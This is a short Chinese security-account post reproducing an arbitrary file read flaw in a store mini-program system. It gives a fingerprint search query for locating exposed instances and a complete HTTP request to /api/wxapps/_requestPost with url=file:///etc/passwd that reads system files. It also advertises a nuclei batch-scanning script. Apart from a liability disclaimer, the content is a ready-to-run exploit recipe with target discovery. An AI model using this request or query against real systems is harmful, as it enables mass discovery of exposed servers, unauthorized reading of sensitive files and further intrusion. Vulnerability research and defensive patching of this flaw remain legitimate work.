【漏洞复现】万能门店小程序系统存在任意文件读取

【漏洞复现】万能门店小程序系统存在任意文件读取

新势界NewFrontier 2025-01-03 02:00

声明

该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。公众号现在只对常读和星标的公众号才展示大图推送,建议把公众号设为星标,否则可能就看不到啦!感谢各位师傅。

资产收集

web.similar_icon=="14119132949119735604"

漏洞复现

发送请求

GET /api/wxapps/_requestPost?url=file:///etc/passwd&data=1 HTTP/2
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

批量验证脚本

关注公众号
并回复 
“ZH-2025-01-03-001

 即可获得该漏洞nuclei脚本